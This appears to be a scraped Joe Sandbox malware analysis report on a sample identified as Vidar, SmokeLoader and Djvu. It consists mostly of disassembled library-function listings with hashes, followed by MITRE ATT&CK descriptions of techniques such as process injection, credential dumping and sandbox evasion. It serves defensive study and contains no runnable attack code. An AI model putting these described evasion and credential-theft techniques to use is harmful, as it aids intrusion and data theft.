String ID:
API String ID: 2974526305-0
Opcode ID: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00412806
_malloc.LIBCMT ref: 00412814

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_memset.LIBCMT ref: 0041281F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00470118
_memset.LIBCMT ref: 00470199

Strings

.\crypto\asn1\tasn_new.c, xrefs: 004700F9, 0047017A, 00470202, 00470228

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\asn1\tasn_new.c
API String ID: 2102423945-2878120539
Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 658efdebe0f2e3c623a36cde5f5e34c723793700e4982d929c621f4f0f040811
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 658efdebe0f2e3c623a36cde5f5e34c723793700e4982d929c621f4f0f040811
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00420DD5
__calloc_crt.LIBCMT ref: 00420DEE

Strings

Assertion failed: %s, file %s, line %d, xrefs: 00420E13

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Assertion failed: %s, file %s, line %d
API String ID: 3494438863-969893948
Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

.\crypto\evp\digest.c, xrefs: 00480638
ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: SmokeLoader

Threatname: Djvu

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

